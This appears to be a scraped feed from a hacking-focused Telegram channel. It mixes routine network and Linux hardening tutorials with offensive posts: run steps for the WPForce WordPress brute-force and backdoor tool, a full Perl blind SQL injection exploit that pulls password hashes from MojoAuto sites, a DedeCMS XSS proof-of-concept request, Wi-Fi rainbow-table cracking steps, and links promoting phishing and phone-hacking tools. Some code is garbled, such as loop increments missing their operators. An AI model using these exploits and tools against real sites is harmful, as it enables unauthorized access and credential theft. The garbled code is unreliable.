UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Another web hacking
#requested

F E A T U R E S :

Brute
Force via API, not login form bypassing some forms of protection

Can automatically upload an interactive shell

Can be used to spawn a full featured reverse shell

Dumps WordPress password hashes

Can backdoor authentication function for plaintext password
collection

Inject BeEF hook into all pages

Pivot to meterpreter if needed

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) CLONE https://github.com/n00py/WPForce

2) cd WPForce

3) python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

Full guide https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/


@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What are the hazards of vulnerabilities ?

The harm of SQL injection vulnerabilities is not only reflected in the database level, but also may endanger the operating system that hosts the database; if SQL injection is used to hang horses, it may also be used to spread malware, etc. These hazards include but are not limited to:

β€’ Database information leakage: user privacy information stored in the database is leaked.

β€’ Web page tampering: tampering with specific web pages by operating the database.

β€’ The website is hacked to spread malicious software: modify the value of some fields in the database, embed the link of the network horse, and carry out a hacking attack.

β€’ The database was maliciously operated: The database server was attacked and the database system administrator account was tampered with.

β€’ The server is controlled remotely and a backdoor is installed: the operating system support provided by the database server allows hackers to modify or control the operating system.

β€’ Destroy hard disk data and paralyze the entire system.

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CMD TOP COMMANDS :

#1 Ping
This command uses your internet connection in order to send some packets of data to a specific web address then these packets are sent back to your PC. The test simply shows the amount of time it took to reach the specific address. In simple words, it helps you to know if the host you pinging is alive.

You can use Ping command whenever you need to verify that the host computer can connect to the TCP/IP network and its resources.

For example, you can type in Command prompt ping 8.8.8.8 which belongs to Google.

You can replace β€œ8.8.8.8” to β€œwww.google.com” or something else which you want to ping.

#2 nslookup
It is a network administration command-line tool which helps you to obtain domain name or IP address mapping for any specific DNS record. Suppose you have a website URL but want to know its IP Address, you can simply type in CMD

nslookup www.google.com (Replace Google.com with your website URL of which you want to find the IP address)

#3 tracert
You can say Trace Route like its name it allows users to trace the route than an IP packed has taken to reach a destination. The command calculates and displays the amount of time each hop took to reach a destination. You just need to type

tracert x.x.x.x (if you know the IP Address) or else you can type tracert www.google.com (If you don’t know the IP address)

#4 arp
This command helps you to modify ARP cache. You can run arp-a command on each computer to see whether the computers have the correct MAC address listed for each other to ping each other succeed on the same subnet.

This command also helps users to find out if anyone has done arp poisoning in their LAN.

You can try typing arp-a in command prompt.

#5 ipconfig
This is the command which shows every useful thing. It will show you IPv6 address, temporary IPv6 address, IPv4 address, Subnet Mask, Default gateway and all other things that you want to know.

You can type in command prompt β€œipconfig” or β€œipconfig/allβ€œ

#6 netstat
If you want to find out who is establishing a connection with your computer then you might try typing in command prompt β€œnetstat -a” it will display all the connection and you will get to know about the active connections and listening ports.

Type in command prompt β€œnetstat -aβ€œ

#7 Route
It is a command which is used to view and manipulate the IP routing table in the Microsoft Windows operating system. This command will show you routing table, metric and interface.

You can type in command prompt β€œroute printβ€œ

#8 Net View
This command displays the whole list of resources, computers or domains that are shared by the specified computer.

You can type in command prompt β€œnet view x.x.x.x or computernameβ€œ

#9 Net User
Well, this command is used to modify changes to use accounts on a computer. You can add, remove users with the help of this command

You can use these commands while using net user

net user [<UserName> {<Password> | *} [<Options>]] [/domain] net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] net user [<UserName> [/delete] [/domain]]

#10 Net Use
This command is been used to connect, remove and configure connections to shared resources like network printers and other mapped drives. The use of this command is a little bit complicated. So, we recommend you to visit the Microsoft site to get full details on how to use this command.

#11 Tasklist
This command opens up an entire task manager on the command prompt. Users just need to enter tasklist on CMD and they will see the list of all running process. You can figure out all the wrongs with this commands.

Moreover, the command can also be used when you need to forcefully close any process. For example, if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F

Not only these, but you can even use iexplore <IP address> to find sites running on any particular IP address. The command is used in multiple ways by the hackers.

From wiki
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
TODAY TOPIC :

hack passwords and more / Cipher
https://t.me/UnderCodeTesting/11758

Wordpress Exploit verified for 5.5.2 version
https://t.me/UnderCodeTesting/11759

#SocialMediaHacking Top Phishing tools
https://t.me/UnderCodeTesting/11762

How to show dropped packets for a network interface on Linux
https://t.me/UnderCodeTesting/11763

How viruses Spread
https://t.me/UnderCodeTesting/11764

Android reverse apk 2 tutorials/methodes
https://t.me/UnderCodeTesting/11765
https://t.me/UnderCodeTesting/11766

How to install dnscrypt proxy with ad blocker on Linux
https://t.me/UnderCodeTesting/11768

HACK PHONE ON SAME NETWORK - BY IP
https://t.me/UnderCodeTesting/11769

Network/ip scanners & More
https://www.kismetwireless.net

What is CA/PEM/DER/X509/PKCS Encryption ?
https://t.me/UnderCodeTesting/11772

Seccubus - Simple automated scanning, reporting and
vulnerability analysis
https://t.me/UnderCodeTesting/11774

Another web hacking
https://t.me/UnderCodeTesting/11775

What are the hazards of vulnerabilities ?
https://t.me/UnderCodeTesting/11776

New proxies detailed list
https://t.me/UnderCodeTesting/11777

CMD TOP COMMANDS
https://t.me/UnderCodeTesting/11778

ENJOY β€οΈπŸ‘πŸ»
USE FOR LEAN & HAVE A GOOD SUNDAY
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ§ How to properly protect sysctl on Linux from spoofing and Syn-flooding ?

A) Protecting your Linux servers from SYN attacks and IP spoofing isn't as difficult as you might think.
Let's take a look at this with examples.
Sysctl allows you to make changes to a running Linux kernel.
This utility reads and modifies various kernel attributes such as version number, maximum limits, and a number of security parameters.

The sysctl system also helps prevent attacks such as SYN floods and IP spoofing.

B) This configuration will be as follows:

-Disable IP forwarding
-Disable packet forwarding
-Disable accepting ICMP redirects
-ENable protection against incorrect error messages

πŸ¦‘What you need:

-Linux
-User with sudo privileges

πŸ¦‘How to edit the sysctl config file
Log into your Linux server or desktop and open a terminal window.
In the terminal, enter the command:
sudo nano /etc/sysctl.conf
First required parameter:
# net.ipv4.ip_forward = 1
change to:

net.ipv4.ip_forward = 0
Next line:

# net.ipv4.conf.all.send_redirects = 0
change to:

net.ipv4.conf.all.send_redirects = 0
Find the line:

# net.ipv4.conf.all.accept_redirects = 0
change to:

net.ipv4.conf.all.accept_redirects = 0
Add the following line below that:

net.ipv4.conf.default.accept_redirects = 0
Finally, add the following lines to the end of the file:

net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 3
net.ipv4.netfilter.ip_conntrack_tcp_timeout_syn_recv = 45

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ–§ How to manage Ethernet card using ethtool command :

A) How to install ethtool on Linux

By default ethtool should already be installed on most systems.

If not, you can install it from the official distribution repository.

1) For RHEL / CentOS 6/7 systems, use yum command to install ethtool.

$ sudo yum install -y ethtool

2) For RHEL / CentOS 8 and Fedora systems, use dnf command to install ethtool.

$ sudo yum install -y ethtool

3) For Debian based systems use apt or apt-get command to install ethtool.
$ sudo apt-get install ethtool

4) For openSUSE systems, use the zypper command to install ethtool.
$ sudo zypper install -y ethtool

5) For Arch Linux systems, use the pacman command to install ethtool.
$ sudo pacman -S ethtool

πŸ¦‘How to check available network interfaces on Linux :

You can use the ip command or the ifconfig command (not recommended in modern distribution) to check the name and other details about the available and active network interfaces.

# ip a
or
# ifconfig

1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000
link / ether 00: 10: 22: 35: 23: sf brd ff: ff: ff: ff: ff: ff
inet 192.164.23.100/24 brd 192.164.23.255 scope global eth0
valid_lft forever preferred_lft forever

πŸ¦‘How to check network card (NIC) information on Linux

Once you get the name of the Ethernet interface, you can easily check it using the ethtool command as shown below.

In Linux, each network card (NIC) is assigned unique names such as ethX, enpXXX, etc.
Older Linux distributions used the eth [X] format. For example, RHEL 6 and older versions.
Modern Linux distributions use the enp [XXX] or ens [XXX] formats. For example, most modern Linux distributions use this format, including RHEL 7, Debian 10, Ubuntu 16.04 LTS.
# ethtool eth0

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit :

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoAuto Blind SQL Injection Exploit #\n";
print " # (mojoAuto.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat_a value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_a = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_a = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
A Critical vulnerability in DedeCMS allow users to inject code into web pages.
#Vulnerabilities
Verified by Undercode, allow to hack many chinese websites :
A Warning for peoples for securing themself

πŸ¦‘A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.
PoC :
POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
Upgrade-Insecure-Requests: 1
keyword="><script>alert(1)</script>


▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Wi-Fi rainbow table generator :

Wi-Fi rainbow tables can be generated by the wlangenpmkocl program from the hcxkeys package .

πŸ¦‘The hcxkeys package includes two utilities:

1) wlangenpmk - Generates plainmasterkeys (using CPU) from essid and password for use in hashcat (with hash mode 2501) or John the Ripper (hash type wpapsk-pmk)

2) wlangenpmkocl - generates plainmasterkeys (using GPU) from essid and password for use in hashcat (with 2501 hash mode) or John the Ripper (wpapsk-pmk hash type)

3) That is, the only difference between them is that wlangenpmkocl uses a video card, while wlangenpmk uses a central processor. It is of course preferable to use the graphics card version (i.e. wlangenpmkocl ). The wlangenpmk version is only for extreme situations - you do not have a discrete video card or you cannot install its driver for full OpenCL support

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

> How to install hcxkeys

1) To use wlangenpmkocl , install the drivers for the video card, information about this and about OpenCL can be found in the articles:

Installing video drivers in Linux
How to crack passwords in Linux with a video card and central processor
Installation on Kali Linux

1) sudo apt install openssl opencl-headers git

2) git clone https://github.com/ZerBea/hcxkeys

3) cd hcxkeys/

4) make

5) sudo make install

If the following messages are displayed while executing the make command :

1) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmk wlangenpmk.c -lcrypto

2) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o wlangenpmkocl wlangenpmkocl.c -lcrypto -lOpenCL

3) In file included from /usr/include/CL/cl.h:20,
from wlangenpmkocl.c:26:
/usr/include/CL/cl_version.h:22:9: note: β€˜#pragma message: cl_version.h: CL_TARGET_OPENCL_VERSION is not defined.

4) Defaulting to 220 (OpenCL 2.2)’
22 | #pragma message("cl_version.h: CL_TARGET_OPENCL_VERSION is not defined. Defaulting to 220 (OpenCL 2.2)")
| ^~~~~~~

5) gcc -O3 -Wall -Wextra -std=gnu99 -DVERSION_TAG=\"6.0.0-2-gcc4549f\" -DVERSION_YEAR=\"2020\" -o pwhash pwhash.c -lcrypto

6) then these are not errors - they are information. Compilation should still succeed and you can continue.

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What is HNAP ?

Home Network Administration Protocol (HNAP) - Home Network Administration Protocol is a proprietary network protocol invented by Pure Networks, Inc. and acquired by Cisco Systems, which allows you to identify, configure and manage network devices. HNAP is based on SOAP.

This protocol appeared in 2007 and can be considered as a direct competitor to UPnP. Notable users of this protocol were Cisco and D-Link. However, both stopped using this protocol in 2012 and 2016, respectively. That is, yes, new devices no longer support this protocol, but the old routers are still there.

Especially noteworthy is that this feature is often hidden from the admin panel, making it impossible to disable it. If your router still supports HNAP, this probably means your router needs to be replaced.

Beginning in January 2010, vulnerabilities were discovered in several D-Link network devices, in which HNAP authentication could be bypassed.


@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
2020 Hack with ripple.pdf
4.1 MB
multiple zero day vulnerabilities in the Treck TCP/IP stack that is widely used in embedded and IoT devices.